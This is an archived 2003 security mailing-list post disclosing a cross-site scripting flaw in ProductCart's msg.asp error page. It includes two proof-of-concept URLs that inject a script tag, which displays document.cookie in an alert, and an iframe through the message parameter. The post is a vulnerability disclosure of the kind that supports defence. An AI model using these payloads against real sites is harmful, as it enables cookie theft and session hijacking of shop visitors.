ProductCart XSS Vulnerability

From: atomix atomix (at0mix87at_private)
Date: Fri Jul 04 2003 - 22:29:49 PDT

Next message: KF: "Re: [Full-Disclosure] Re: [sec-labs] Adobe Acrobat Reader <=5.0.7 Buffer Overflow Vulnerability + PoC code"

Previous message: Tim Yardley: "[Full-Disclosure] RE: [VulnWatch] MacOSX - crash screensaver locked with password and get thedesktop back"
Next in thread: Massimo Arrigoni: "Re: ProductCart XSS Vulnerability"
Reply: Massimo Arrigoni: "Re: ProductCart XSS Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) ##################### # ProductCart XSS # # Vulnerability # # found by atomix # ##################### i came across the fact that in an area of ProductCart you are able to manipulate the error message, therefore allowing tags such as <script> and <iframe> to be used: http://www.website.com/ProductCart/pc/msg.asp?message=><script>alert (document.cookie);</script> http://www.website.com/ProductCart/pc/msg.asp?message=="C:\"% 20width=400%20height=400></iframe> -atomix | atom b0mbs

Next message: KF: "Re: [Full-Disclosure] Re: [sec-labs] Adobe Acrobat Reader <=5.0.7 Buffer Overflow Vulnerability + PoC code"
Previous message: Tim Yardley: "[Full-Disclosure] RE: [VulnWatch] MacOSX - crash screensaver locked with password and get thedesktop back"
Next in thread: Massimo Arrigoni: "Re: ProductCart XSS Vulnerability"
Reply: Massimo Arrigoni: "Re: ProductCart XSS Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Jul 07 2003 - 15:59:12 PDT